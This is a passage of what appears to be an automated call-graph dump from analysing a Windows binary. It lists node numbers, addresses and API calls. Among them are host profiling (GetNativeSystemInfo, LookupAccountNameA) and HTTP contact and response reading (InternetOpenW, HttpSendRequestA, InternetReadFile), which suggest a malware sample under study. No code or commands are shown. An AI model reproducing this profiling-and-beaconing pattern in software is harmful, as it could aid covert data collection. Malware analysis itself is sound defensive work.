12238->12245 12241 e301e 12277 fc26a 12241->12277 12242 e2f1d 12246 fd3e2 RtlAllocateHeap 12242->12246 12249 e2f30 __Mtx_unlock 12242->12249 12244 e3024 12247 fc26a 6 API calls 12244->12247 12248 e2fb9 12245->12248 12246->12249 12247->12248 12251 fc26a 6 API calls 12248->12251 12252 e2fc0 __Mtx_unlock 12248->12252 12249->12244 12250 e2f6f 12249->12250 12250->12235 12250->12237 12251->12252 12253 fc26a 6 API calls 12252->12253 12254 e2fd8 __Cnd_broadcast 12252->12254 12253->12254 12254->12237 12255 fc26a 6 API calls 12254->12255 12256 e303c 12255->12256 12257 fc6ac GetSystemTimePreciseAsFileTime 12256->12257 12265 e3080 shared_ptr __Mtx_unlock 12257->12265 12258 e31c5 12259 fc26a 6 API calls 12258->12259 12260 e31cb 12259->12260 12261 fc26a 6 API calls 12260->12261 12262 e31d1 12261->12262 12263 fc26a 6 API calls 12262->12263 12271 e3193 __Mtx_unlock 12263->12271 12264 e31a7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12264->12205 12265->12258 12265->12260 12265->12264 12268 e3132 GetCurrentThreadId 12265->12268 12266 fc26a 6 API calls 12267 e31dd 12266->12267 12268->12264 12269 e313b 12268->12269 12269->12264 12270 fc6ac GetSystemTimePreciseAsFileTime 12269->12270 12272 e315f 12270->12272 12271->12264 12271->12266 12272->12258 12272->12262 12272->12271 12281 fbd4c 12272->12281 12284 fc452 12274->12284 12276 e2f12 12276->12241 12276->12242 12278 fc292 12277->12278 12279 fc274 12277->12279 12278->12278 12279->12278 12301 fc297 12279->12301 12374 fbb72 12281->12374 12283 fbd5c 12283->12272 12285 fc4a8 12284->12285 12287 fc47a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12284->12287 12285->12287 12290 fcf6b 12285->12290 12287->12276 12288 fc4fd __Xtime_diff_to_millis2 12288->12287 12289 fcf6b _xtime_get GetSystemTimePreciseAsFileTime 12288->12289 12289->12288 12291 fcf7a 12290->12291 12293 fcf87 __aulldvrm 12290->12293 12291->12293 12294 fcf44 12291->12294 12293->12288 12297 fcbea 12294->12297 12298 fcbfb GetSystemTimePreciseAsFileTime 12297->12298 12299 fcc07 12297->12299 12298->12299 12299->12293 12306 e2ae0 12301->12306 12305 fc2bf std::_Throw_future_error 12305->12279 12318 fbedf 12306->12318 12308 e2aff 12312 fc1ff 12308->12312 12309 e2af4 __fassign 12309->12308 12310 118bec __fassign 4 API calls 12309->12310 12311 116cf6 12310->12311 12313 fc20b __EH_prolog3_GS 12312->12313 12325 f80c0 12313->12325 12315 fc23d 12338 e26b0 12315->12338 12317 fc252 12317->12305 12321 fcc31 12318->12321 12322 fcc3f InitOnceExecuteOnce 12321->12322 12324 fbef2 12321->12324 12322->12324 12324->12309 12327 f80de 12325->12327 12328 f8104 12325->12328 12327->12315 12331 f817d 12328->12331 12332 f8158 12328->12332 12336 f8169 12328->12336 12329 f81f3 12330 e2480 RtlAllocateHeap 12329->12330 12333 f81f8 12330->12333 12334 fd3e2 RtlAllocateHeap 12331->12334 12331->12336 12332->12329 12335 fd3e2 RtlAllocateHeap 12332->12335 12334->12336 12335->12336 12337 f81d0 shared_ptr 12336->12337 12347 f9270 12336->12347 12337->12315 12339 f7a00 RtlAllocateHeap 12338->12339 12340 e2702 12339->12340 12341 e2725 12340->12341 12356 f8f40 12340->12356 12343 f8f40 RtlAllocateHeap 12341->12343 12345 e278e shared_ptr 12341->12345 12343->12345 12344 1138af ___std_exception_copy RtlAllocateHeap 12346 e284b shared_ptr ___std_exception_destroy __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12344->12346 12345->12344 12345->12346 12346->12317 12350 fc1b9 12347->12350 12353 fc123 12350->12353 12352 fc1ca std::_Throw_future_error 12354 e22e0 std::future_error::future_error RtlAllocateHeap 12353->12354 12355 fc135 12354->12355 12355->12352 12357 f908e 12356->12357 12358 f8f6b 12356->12358 12359 f9270 RtlAllocateHeap 12357->12359 12362 f8fdc 12358->12362 12363 f8fb2 12358->12363 12360 f9093 12359->12360 12361 e2480 RtlAllocateHeap 12360->12361 12367 f8fc3 12361->12367 12365 fd3e2 RtlAllocateHeap 12362->12365 12362->12367 12363->12360 12364 f8fbd 12363->12364 12366 fd3e2 RtlAllocateHeap 12364->12366 12365->12367 12366->12367 12368 f90b8 12367->12368 12370 f904c shared_ptr 12367->12370 12371 e2480 std::_Throw_future_error 12367->12371 12369 fd3e2 RtlAllocateHeap 12368->12369 12369->12370 12370->12341 12372 1138af ___std_exception_copy RtlAllocateHeap 12371->12372 12373 e24c3 12372->12373 12373->12341 12375 fbb9c 12374->12375 12376 fcf6b _xtime_get GetSystemTimePreciseAsFileTime 12375->12376 12379 fbba4 __Xtime_diff_to_millis2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12375->12379 12377 fbbcf __Xtime_diff_to_millis2 12376->12377 12378 fcf6b _xtime_get GetSystemTimePreciseAsFileTime 12377->12378 12377->12379 12378->12379 12379->12283 12381 fc1b9 RtlAllocateHeap 12380->12381 12382 f91ea 12381->12382 12384 fd3e2 RtlAllocateHeap 12383->12384 12385 e2c0e 12384->12385 12393 fb847 12385->12393 12387 e2c42 12388 e2c49 12387->12388 12399 e2c80 12387->12399 12388->12199 12390 e2c58 12402 e2560 12390->12402 12392 e2c65 std::_Throw_future_error 12394 fb854 12393->12394 12398 fb873 Concurrency::details::_Reschedule_chore 12393->12398 12405 fcb77 12394->12405 12396 fb864 12396->12398 12407 fb81e 12396->12407 12398->12387 12413 fb7fb 12399->12413 12401 e2cb2 shared_ptr 12401->12390 12403 1138af ___std_exception_copy RtlAllocateHeap 12402->12403 12404 e2597 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12403->12404 12404->12392 12406 fcb92 CreateThreadpoolWork 12405->12406 12406->12396 12408 fb827 Concurrency::details::_Reschedule_chore 12407->12408 12411 fcdcc 12408->12411 12410 fb841 12410->12398 12412 fcde1 TpPostWork 12411->12412 12412->12410 12414 fb817 12413->12414 12415 fb807 12413->12415 12414->12401 12415->12414 12417 fca78 12415->12417 12418 fca8d TpReleaseWork 12417->12418 12418->12414 12599 f6c70 12603 f6ca0 12599->12603 12600 e5c10 6 API calls 12600->12603 12601 f7a00 RtlAllocateHeap 12601->12603 12603->12600 12603->12601 12604 f47b0 12603->12604 12605 f47eb 12604->12605 12722 f4e70 shared_ptr 12604->12722 12607 f7a00 RtlAllocateHeap 12605->12607 12605->12722 12606 f4f59 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12606->12603 12608 f480c 12607->12608 12609 e5c10 6 API calls 12608->12609 12610 f4813 12609->12610 12612 f7a00 RtlAllocateHeap 12610->12612 12614 f4825 12612->12614 12613 f5015 12939 e6950 12613->12939 12616 f7a00 RtlAllocateHeap 12614->12616 12617 f4837 12616->12617 12864 ebe30 12617->12864 12619 f50de shared_ptr 12949 e7d30 12619->12949 12620 f4843 12622 f7a00 RtlAllocateHeap 12620->12622 12623 f4858 12622->12623 12626 f7a00 RtlAllocateHeap 12623->12626 12624 f50ed 13028 e45b0 12624->13028 12625 f5025 shared_ptr 12625->12619 12659 f6c46 12625->12659 12628 f4870 12626->12628 12630 e5c10 6 API calls 12628->12630 12629 f50fa 13032 e8380 12629->13032 12632 f4877 12630->12632 12888 e8580 12632->12888 12633 f5106 12635 e45b0 RtlAllocateHeap 12633->12635 12636 f5113 12635->12636 12640 e45b0 RtlAllocateHeap 12636->12640 12637 f4883 12638 f7a00 RtlAllocateHeap 12637->12638 12719 f4afd 12637->12719 12642 f489f 12638->12642 12639 f7a00 RtlAllocateHeap 12643 f4b2f 12639->12643 12644 f5130 12640->12644 12641 f7a00 RtlAllocateHeap 12641->12659 12645 f7a00 RtlAllocateHeap 12642->12645 12646 f7a00 RtlAllocateHeap 12643->12646 12647 f7a00 RtlAllocateHeap 12644->12647 12649 f48b7 12645->12649 12650 f4b44 12646->12650 12651 f514e 12647->12651 12648 e5c10 6 API calls 12648->12659 12652 e5c10 6 API calls 12649->12652 12653 f7a00 RtlAllocateHeap 12650->12653 12654 e5c10 6 API calls 12651->12654 12656 f48be 12652->12656 12657 f4b56 12653->12657 12658 f5155 12654->12658 12655 f47b0 22 API calls 12655->12659 12660 e8580 RtlAllocateHeap 12656->12660 12661 ebe30 12 API calls 12657->12661 12663 f7a00 RtlAllocateHeap 12658->12663 12659->12641 12659->12648 12659->12655 12664 f48ca 12660->12664 12662 f4b62 12661->12662 12665 f7a00 RtlAllocateHeap 12662->12665 12666 f516a 12663->12666 12667 f7a00 RtlAllocateHeap 12664->12667 12664->12719 12668 f4b77 12665->12668 12669 e5c10 6 API calls 12666->12669 12670 f48e7 12667->12670 12671 f7a00 RtlAllocateHeap 12668->12671 12672 f5171 12669->12672 12673 e5c10 6 API calls 12670->12673 12674 f4b8f 12671->12674 12680 f80c0 RtlAllocateHeap 12672->12680 12678 f48ef 12673->12678 12675 e5c10 6 API calls 12674->12675 12676 f4b96 12675->12676 12677 e8580 RtlAllocateHeap 12676->12677 12679 f4ba2 12677->12679 12681 f80c0 RtlAllocateHeap 12678->12681 12682 f7a00 RtlAllocateHeap 12679->12682 12679->12722 12689 f51ed 12680->12689 12686 f4959 shared_ptr 12681->12686 12683 f4bbe 12682->12683 12684 f7a00 RtlAllocateHeap 12683->12684 12685 f4bd6 12684->12685 12688 e5c10 6 API calls 12685->12688 12687 f7a00 RtlAllocateHeap 12686->12687 12690 f49e6 12687->12690 12691 f4bdd 12688->12691 13044 f7de0 12689->13044 12694 e5c10 6 API calls 12690->12694 12692 e8580 RtlAllocateHeap 12691->12692 12695 f4be9 12692->12695 12701 f49ee 12694->12701 12698 f7a00 RtlAllocateHeap 12695->12698 12695->12722 12696 f5259 13057 f7760 12696->13057 12700 f4c06 12698->12700 12699 f52b8 12704 f8ca0 RtlAllocateHeap 12699->12704 12706 f5335 shared_ptr 12699->12706 12703 e5c10 6 API calls 12700->12703 12702 f80c0 RtlAllocateHeap 12701->12702 12707 f4a49 shared_ptr 12702->12707 12705 f4c0e 12703->12705 12704->12699 12708 f4c5a 12705->12708 12709 f4f97 12705->12709 12714 f80c0 RtlAllocateHeap 12706->12714 12707->12719 13069 e98f0 12707->13069 12712 f80c0 RtlAllocateHeap 12708->12712 12711 f8200 RtlAllocateHeap 12709->12711 12713 f4f9c 12711->12713 12720 f4c78 shared_ptr 12712->12720 12715 fc1d9 RtlAllocateHeap 12713->12715 12726 f53fd shared_ptr 12714->12726 12715->12722 12716 f4ad5 __dosmaperr 12717 118ab6 5 API calls 12716->12717 12716->12719 12717->12719 12718 f7a00 RtlAllocateHeap 12721 f4d05 12718->12721 12719->12639 12719->12713 12720->12718 12720->12722 12724 e5c10 6 API calls 12721->12724 12722->12606 12915 e65e0 12722->12915 12723 e45b0 RtlAllocateHeap 12725 f549d 12723->12725 12729 f4d0d 12724->12729 12727 f7a00 RtlAllocateHeap 12725->12727 12726->12723 12728 f54b7 12727->12728 12730 e5c10 6 API calls 12728->12730 12731 f80c0 RtlAllocateHeap 12729->12731 12732 f54c2 12730->12732 12740 f4d68 shared_ptr 12731->12740 12733 e45b0 RtlAllocateHeap 12732->12733 12734 f54d7 12733->12734 12735 f7a00 RtlAllocateHeap 12734->12735 12737 f54eb 12735->12737 12736 f7a00 RtlAllocateHeap 12738 f4df7 12736->12738 12739 e5c10 6 API calls 12737->12739 12741 f7a00 RtlAllocateHeap 12738->12741 12742 f54f6 12739->12742 12740->12722 12740->12736 12743 f4e0c 12741->12743 12744 f7a00 RtlAllocateHeap 12742->12744 12745 f7a00 RtlAllocateHeap 12743->12745 12746 f5514 12744->12746 12747 f4e27 12745->12747 12748 e5c10 6 API calls 12746->12748 12749 e5c10 6 API calls 12747->12749 12750 f551f 12748->12750 12751 f4e2e 12749->12751 12752 f7a00 RtlAllocateHeap 12750->12752 12755 f80c0 RtlAllocateHeap 12751->12755 12753 f553d 12752->12753 12754 e5c10 6 API calls 12753->12754 12756 f5548 12754->12756 12757 f4e67 12755->12757 12758 f7a00 RtlAllocateHeap 12756->12758 12894 f4390 12757->12894 12760 f5566 12758->12760 12761 e5c10 6 API calls 12760->12761 12762 f5571 12761->12762 12763 f7a00 RtlAllocateHeap 12762->12763 12764 f558f 12763->12764 12765 e5c10 6 API calls 12764->12765 12766 f559a 12765->12766 12767 f7a00 RtlAllocateHeap 12766->12767 12768 f55b8 12767->12768 12769 e5c10 6 API calls 12768->12769 12770 f55c3 12769->12770 12771 f7a00 RtlAllocateHeap 12770->12771 12772 f55e1 12771->12772 12773 e5c10 6 API calls 12772->12773 12774 f55ec 12773->12774 12775 f7a00 RtlAllocateHeap 12774->12775 12776 f560a 12775->12776 12777 e5c10 6 API calls 12776->12777 12778 f5615 12777->12778 12779 f7a00 RtlAllocateHeap 12778->12779 12780 f5631 12779->12780 12781 e5c10 6 API calls 12780->12781 12782 f563c 12781->12782 12783 f7a00 RtlAllocateHeap 12782->12783 12784 f5653 12783->12784 12785 e5c10 6 API calls 12784->12785 12786 f565e 12785->12786 12787 f7a00 RtlAllocateHeap 12786->12787 12788 f5675 12787->12788 12789 e5c10 6 API calls 12788->12789 12790 f5680 12789->12790 12791 f7a00 RtlAllocateHeap 12790->12791 12792 f569c 12791->12792 12793 e5c10 6 API calls 12792->12793 12794 f56a7 12793->12794 13074 f8320 12794->13074 12796 f56bb 12797 f8220 RtlAllocateHeap 12796->12797 12798 f56cf 12797->12798 12799 f8220 RtlAllocateHeap 12798->12799 12800 f56e3 12799->12800 12801 f8220 RtlAllocateHeap 12800->12801 12802 f56f7 12801->12802 12803 f8320 RtlAllocateHeap 12802->12803 12804 f570b 12803->12804 12805 f8220 RtlAllocateHeap 12804->12805 12806 f571f 12805->12806 12807 f8320 RtlAllocateHeap 12806->12807 12808 f5733 12807->12808 12809 f8220 RtlAllocateHeap 12808->12809 12810 f5747 12809->12810 12811 f8320 RtlAllocateHeap 12810->12811 12812 f575b 12811->12812 12813 f8220 RtlAllocateHeap 12812->12813 12814 f576f 12813->12814 12815 f8320 RtlAllocateHeap 12814->12815 12816 f5783 12815->12816 12817 f8220 RtlAllocateHeap 12816->12817 12818 f5797 12817->12818 12819 f8320 RtlAllocateHeap 12818->12819 12820 f57ab 12819->12820 12821 f8220 RtlAllocateHeap 12820->12821 12822 f57bf 12821->12822 12823 f8320 RtlAllocateHeap 12822->12823 12824 f57d3 12823->12824 12825 f8220 RtlAllocateHeap 12824->12825 12826 f57e7 12825->12826 12827 f8320 RtlAllocateHeap 12826->12827 12828 f57fb 12827->12828 12829 f8220 RtlAllocateHeap 12828->12829 12830 f580f 12829->12830 12831 f8320 RtlAllocateHeap 12830->12831 12832 f5823 12831->12832 12833 f8220 RtlAllocateHeap 12832->12833 12834 f5837 12833->12834 12835 f8220 RtlAllocateHeap 12834->12835 12836 f584b 12835->12836 12837 f8220 RtlAllocateHeap 12836->12837 12838 f585f 12837->12838 12839 f8320 RtlAllocateHeap 12838->12839 12840 f5873 shared_ptr 12839->12840 12841 f665b 12840->12841 12842 f6507 12840->12842 12843 f7a00 RtlAllocateHeap 12841->12843 12844 f7a00 RtlAllocateHeap 12842->12844 12845 f6670 12843->12845 12846 f651d 12844->12846 12847 f7a00 RtlAllocateHeap 12845->12847 12848 e5c10 6 API calls 12846->12848 12849 f6685 12847->12849 12850 f6528 12848->12850 13078 e49a0 12849->13078 12852 f8320 RtlAllocateHeap 12850->12852 12863 f653c shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12852->12863 12853 f6694 12854 f7760 RtlAllocateHeap 12853->12854 12859 f66db 12854->12859 12855 f67d6 12856 f7a00 RtlAllocateHeap 12855->12856 12857 f67ec 12856->12857 12858 e5c10 6 API calls 12857->12858 12860 f67f7 12858->12860 12859->12855 12861 f8ca0 RtlAllocateHeap 12859->12861 12862 f8220 RtlAllocateHeap 12860->12862 12861->12859 12862->12863 12863->12603 12865 ebe82 12864->12865 12866 ec281 12864->12866 12865->12866 12868 ebe96 Sleep InternetOpenW InternetConnectA 12865->12868 12867 f80c0 RtlAllocateHeap 12866->12867 12873 ec22e shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12867->12873 12869 f7a00 RtlAllocateHeap 12868->12869 12870 ebf18 12869->12870 12871 e5c10 6 API calls 12870->12871 12872 ebf23 HttpOpenRequestA 12871->12872 12877 ebf4c shared_ptr 12872->12877 12873->12620 12875 f7a00 RtlAllocateHeap 12876 ebfb4 12875->12876 12878 e5c10 6 API calls 12876->12878 12877->12875 12879 ebfbf 12878->12879 12880 f7a00 RtlAllocateHeap 12879->12880 12881 ebfd8 12880->12881 12882 e5c10 6 API calls 12881->12882 12883 ebfe3 HttpSendRequestA 12882->12883 12885 ec006 shared_ptr 12883->12885 12886 ec08e InternetReadFile 12885->12886 12887 ec0b5 12886->12887 12890 e86a0 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12888->12890 12893 e85d5 shared_ptr 12888->12893 12889 e8767 12892 f8200 RtlAllocateHeap 12889->12892 12890->12637 12891 f80c0 RtlAllocateHeap 12891->12893 12892->12890 12893->12889 12893->12890 12893->12891 12895 f7a00 RtlAllocateHeap 12894->12895 12896 f43d2 12895->12896 12897 f7a00 RtlAllocateHeap 12896->12897 12898 f43e4 12897->12898 12899 e8580 RtlAllocateHeap 12898->12899 12900 f43ed 12899->12900 12901 f4646 12900->12901 12912 f43f8 shared_ptr 12900->12912 12902 f7a00 RtlAllocateHeap 12901->12902 12903 f4657 12902->12903 12904 f7a00 RtlAllocateHeap 12903->12904 12905 f466c 12904->12905 12906 f7a00 RtlAllocateHeap 12905->12906 12908 f467e 12906->12908 12907 f9280 RtlAllocateHeap 12907->12912 12910 f3640 19 API calls 12908->12910 12909 f4610 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12909->12722 12910->12909 12911 f7a00 RtlAllocateHeap 12911->12912 12912->12907 12912->12909 12912->12911 12914 f80c0 RtlAllocateHeap 12912->12914 13085 f3640 12912->13085 12914->12912 12938 4ac0ba0 12915->12938 12916 e663f LookupAccountNameA 12917 e6692 12916->12917 12918 f7a00 RtlAllocateHeap 12917->12918 12919 e66a6 12918->12919 12920 e5c10 6 API calls 12919->12920 12921 e66b1 12920->12921 12922 e22c0 5 API calls 12921->12922 12924 e66c9 shared_ptr 12922->12924 12923 e68e3 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12923->12613 12924->12923 12925 f7a00 RtlAllocateHeap 12924->12925 12926 e6732 12925->12926 12927 e5c10 6 API calls 12926->12927 12928 e673d 12927->12928 12929 e22c0 5 API calls 12928->12929 12937 e6757 shared_ptr 12929->12937 12930 e6852 12931 f80c0 RtlAllocateHeap 12930->12931 12933 e689c 12931->12933 12932 f7a00 RtlAllocateHeap 12932->12937 12934 f80c0 RtlAllocateHeap 12933->12934 12934->12923 12935 e5c10 6 API calls 12935->12937 12936 e22c0 5 API calls 12936->12937 12937->12923 12937->12930 12937->12932 12937->12935 12937->12936 12938->12916 12946 e69c8 shared_ptr 12939->12946 12948 e6ca1 12939->12948 12940 e6cc4 12942 f80c0 RtlAllocateHeap 12940->12942 12941 e6d63 12943 f8200 RtlAllocateHeap 12941->12943 12944 e6ce3 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12942->12944 12943->12944 12944->12625 12945 f80c0 RtlAllocateHeap 12945->12946 12946->12941 12946->12944 12946->12945 12947 f9280 RtlAllocateHeap 12946->12947 12946->12948 12947->12946 12948->12940 12948->12941 12950 e7d96 __cftof 12949->12950 12951 f7a00 RtlAllocateHeap 12950->12951 12986 e7ee8 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12950->12986 12952 e7dc7 12951->12952 12953 e5c10 6 API calls 12952->12953 12954 e7dd2 12953->12954 12955 f7a00 RtlAllocateHeap 12954->12955 12956 e7df4 12955->12956 12957 e5c10 6 API calls 12956->12957 12959 e7dff shared_ptr 12957->12959 12958 e7ed3 GetNativeSystemInfo 12960 e7ed7 12958->12960 12959->12958 12959->12960 12959->12986 12961 e7f3f 12960->12961 12962 e8019 12960->12962 12960->12986 12964 f7a00 RtlAllocateHeap 12961->12964 12963 f7a00 RtlAllocateHeap 12962->12963 12965 e8045 12963->12965 12966 e7f60 12964->12966 12967 e5c10 6 API calls 12965->12967 12968 e5c10 6 API calls 12966->12968 12969 e804c 12967->12969 12970 e7f67 12968->12970 12972 f7a00 RtlAllocateHeap 12969->12972 12971 f7a00 RtlAllocateHeap 12970->12971 12973 e7f7f 12971->12973 12974 e8064 12972->12974 12975 e5c10 6 API calls 12973->12975 12976 e5c10 6 API calls 12974->12976 12978 e7f86 12975->12978 12977 e806b 12976->12977 12979 f7a00 RtlAllocateHeap 12977->12979 13859 118bbe 12978->13859 12981 e809c 12979->12981 12982 e5c10 6 API calls 12981->12982 12983 e80a3 12982->12983 12984 e5730 RtlAllocateHeap 12983->12984 12985 e80b2 12984->12985 12987 f7a00 RtlAllocateHeap 12985->12987 12986->12624 12988 e80ed 12987->12988 12989 e5c10 6 API calls 12988->12989 12990 e80f4 12989->12990 12991 f7a00 RtlAllocateHeap 12990->12991 12992 e810c 12991->12992 12993 e5c10 6 API calls 12992->12993 12994 e8113 12993->12994 12995 f7a00 RtlAllocateHeap 12994->12995 12996 e8144 12995->12996 12997 e5c10 6 API calls 12996->12997 12998 e814b 12997->12998 12999 e5730 RtlAllocateHeap 12998->12999 13000 e815a 12999->13000 13001 f7a00 RtlAllocateHeap 13000->13001 13002 e8195 13001->13002 13003 e5c10 6 API calls 13002->13003 13004 e819c 13003->13004 13005 f7a00 RtlAllocateHeap 13004->13005 13006 e81b4 13005->13006 13007 e5c10 6 API calls 13006->13007 13008 e81bb 13007->13008 13009 f7a00 RtlAllocateHeap 13008->13009 13010 e81ec 13009->13010 13011 e5c10 6 API calls 13010->13011 13012 e81f3 13011->13012 13013 e5730 RtlAllocateHeap 13012->13013 13014 e8202 13013->13014 13015 f7a00 RtlAllocateHeap 13014->13015 13016 e823d 13015->13016 13017 e5c10 6 API calls 13016->13017 13018 e8244 13017->13018 13019 f7a00 RtlAllocateHeap 13018->13019 13020 e825c 13019->13020 13021 e5c10 6 API calls 13020->13021 13022 e8263 13021->13022 13023 f7a00 RtlAllocateHeap 13022->13023 13024 e8294 13023->13024 13025 e5c10 6 API calls 13024->13025 13026 e829b 13025->13026 13027 e5730 RtlAllocateHeap 13026->13027 13027->12986 13029 e45d4 13028->13029 13030 e4647 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13029->13030 13031 f80c0 RtlAllocateHeap 13029->13031 13030->12629 13031->13030 13033 e83e5 __cftof 13032->13033 13034 f7a00 RtlAllocateHeap 13033->13034 13043 e8403 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13033->13043 13035 e841c 13034->13035 13036 e5c10 6 API calls 13035->13036 13037 e8427 13036->13037 13038 f7a00 RtlAllocateHeap 13037->13038 13039 e8449 13038->13039 13040 e5c10 6 API calls 13039->13040 13041 e8454 shared_ptr 13040->13041 13042 e8524 GetNativeSystemInfo 13041->13042 13041->13043 13042->13043 13043->12633 13047 f7e01 13044->13047 13048 f7e2c 13044->13048 13045 f7f20 13046 f9270 RtlAllocateHeap 13045->13046 13056 f7e91 shared_ptr 13046->13056 13047->12696 13048->13045 13049 f7f1b 13048->13049 13051 f7ea7 13048->13051 13052 f7e80 13048->13052 13050 e2480 RtlAllocateHeap 13049->13050 13050->13045 13054 fd3e2 RtlAllocateHeap 13051->13054 13051->13056 13052->13049 13053 f7e8b 13052->13053 13055 fd3e2 RtlAllocateHeap 13053->13055 13054->13056 13055->13056 13056->12696 13058 f777b 13057->13058 13068 f7864 shared_ptr 13057->13068 13061 f77ea 13058->13061 13062 f7811 13058->13062 13067 f77fb 13058->13067 13058->13068 13059 f9270 RtlAllocateHeap 13060 f78f6 13059->13060 13063 e2480 RtlAllocateHeap 13060->13063 13061->13060 13065 fd3e2 RtlAllocateHeap 13061->13065 13066 fd3e2 RtlAllocateHeap 13062->13066 13062->13067 13064 f78fb 13063->13064 13065->13067 13066->13067 13067->13059 13067->13068 13068->12699 13070 f7a00 RtlAllocateHeap 13069->13070 13071 e991e 13070->13071 13072 e5c10 6 API calls 13071->13072 13073 e9927 shared_ptr __cftof __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13072->13073 13073->12716 13075 f8339 13074->13075 13076 f834d 13075->13076 13077 f8f40 RtlAllocateHeap 13075->13077 13076->12796 13077->13076 13079 f80c0 RtlAllocateHeap 13078->13079 13080 e49f3 13079->13080 13081 f80c0 RtlAllocateHeap 13080->13081 13082 e4a0c 13081->13082 13862 e4690 13082->13862 13084 e4a99 shared_ptr 13084->12853 13086 f367f 13085->13086 13120 f3e6f shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13085->13120 13087 f80c0 RtlAllocateHeap 13086->13087 13089 f36b0 13087->13089 13088 f4327 13090 f8200 RtlAllocateHeap 13088->13090 13089->13088 13091 f80c0 RtlAllocateHeap 13089->13091 13092 f432c 13090->13092 13093 f36ff 13091->13093 13094 f8200 RtlAllocateHeap 13092->13094 13093->13088 13095 f80c0 RtlAllocateHeap 13093->13095 13098 f4331 13094->13098 13096 f3743 13095->13096 13096->13088 13097 f3765 13096->13097 13099 f80c0 RtlAllocateHeap 13097->13099 13101 f8200 RtlAllocateHeap 13098->13101 13100 f3785 13099->13100 13102 f7a00 RtlAllocateHeap 13100->13102 13105 f4340 13101->13105 13103 f3798 13102->13103 13104 e5c10 6 API calls 13103->13104 13107 f37a3 13104->13107 13106 fc199 std::_Xinvalid_argument RtlAllocateHeap 13105->13106 13119 f3c82 shared_ptr 13106->13119 13107->13092 13108 f37ef 13107->13108 13109 f80c0 RtlAllocateHeap 13108->13109 13113 f3811 shared_ptr 13109->13113 13110 fc1d9 RtlAllocateHeap 13110->13120 13111 e98f0 6 API calls 13112 f3872 13111->13112 13114 f7a00 RtlAllocateHeap 13112->13114 13112->13119 13113->13098 13113->13111 13115 f3889 13114->13115 13116 e5c10 6 API calls 13115->13116 13117 f3894 13116->13117 13118 f80c0 RtlAllocateHeap 13117->13118 13121 f38dc shared_ptr 13118->13121 13119->13110 13119->13120 13120->12912 13121->13098 13122 f39bd 13121->13122 13173 f3ab7 shared_ptr __dosmaperr 13121->13173 13123 f80c0 RtlAllocateHeap 13122->13123 13125 f39da 13123->13125 13124 118ab6 5 API calls 13126 f3b7a 13124->13126 13363 ead70 13125->13363 13126->13105 13128 f3b89 13126->13128 13128->13119 13129 f3c8d 13128->13129 13130 f3e74 13128->13130 13131 f3ba2 13128->13131 13132 f3f42 13128->13132 13138 f80c0 RtlAllocateHeap 13129->13138 13136 f80c0 RtlAllocateHeap 13130->13136 13134 f80c0 RtlAllocateHeap 13131->13134 13139 f7a00 RtlAllocateHeap 13132->13139 13133 f7a00 RtlAllocateHeap 13137 f3a96 13133->13137 13142 f3bca 13134->13142 13135 f39e5 shared_ptr 13135->13105 13135->13133 13143 f3e9c 13136->13143 13144 f7a00 RtlAllocateHeap 13137->13144 13140 f3cb5 13138->13140 13141 f3f56 13139->13141 13147 f7a00 RtlAllocateHeap 13140->13147 13148 f7a00 RtlAllocateHeap 13141->13148 13149 f7a00 RtlAllocateHeap 13142->13149 13145 f7a00 RtlAllocateHeap 13143->13145 13146 f3aa8 13144->13146 13150 f3eba 13145->13150 13151 e49a0 RtlAllocateHeap 13146->13151 13152 f3cd3 13147->13152 13153 f3f6e 13148->13153 13154 f3be8 13149->13154 13155 e5c10 6 API calls 13150->13155 13151->13173 13156 e5c10 6 API calls 13152->13156 13157 f7a00 RtlAllocateHeap 13153->13157 13158 e5c10 6 API calls 13154->13158 13159 f3ec1 13155->13159 13160 f3cda 13156->13160 13161 f3f86 13157->13161 13162 f3bef 13158->13162 13163 f7a00 RtlAllocateHeap 13159->13163 13164 f7a00 RtlAllocateHeap 13160->13164 13165 f7a00 RtlAllocateHeap 13161->13165 13166 f7a00 RtlAllocateHeap 13162->13166 13168 f3ed9 13163->13168 13169 f3cef 13164->13169 13170 f3f98 13165->13170 13167 f3c07 13166->13167 13171 f7a00 RtlAllocateHeap 13167->13171 13172 f7a00 RtlAllocateHeap 13168->13172 13174 f7a00 RtlAllocateHeap 13169->13174 13374 f2f10 13170->13374 13176 f3c1f 13171->13176 13177 f3ef1 13172->13177 13173->13105 13173->13124 13178 f3d07 13174->13178 13179 f7a00 RtlAllocateHeap 13176->13179 13180 f7a00 RtlAllocateHeap 13177->13180 13181 f7a00 RtlAllocateHeap 13178->13181 13182 f3c37 13179->13182 13183 f3f09 13180->13183 13184 f3d1f 13181->13184 13185 f7a00 RtlAllocateHeap 13182->13185 13186 f7a00 RtlAllocateHeap 13183->13186 13187 f7a00 RtlAllocateHeap 13184->13187 13188 f3c4f 13185->13188 13189 f3f21 13186->13189 13190 f3d37 13187->13190 13191 f7a00 RtlAllocateHeap 13188->13191 13192 f7a00 RtlAllocateHeap 13189->13192 13193 f7a00 RtlAllocateHeap 13190->13193 13194 f3c67 13191->13194 13192->13194 13195 f3d49 13193->13195 13197 f7a00 RtlAllocateHeap 13194->13197 13205 f1ec0 13195->13205 13198 f3c79 13197->13198 13200 f08e0 13198->13200 13201 f80c0 RtlAllocateHeap 13200->13201 13202 f0960 13201->13202 13203 f80c0 RtlAllocateHeap 13202->13203 13204 f0a1c 13203->13204 13206 f80c0 RtlAllocateHeap 13205->13206 13207 f1f5b 13206->13207 13208 f1fd8 13207->13208 13209 f1f68 13207->13209 13210 f80c0 RtlAllocateHeap 13208->13210 13211 f7a00 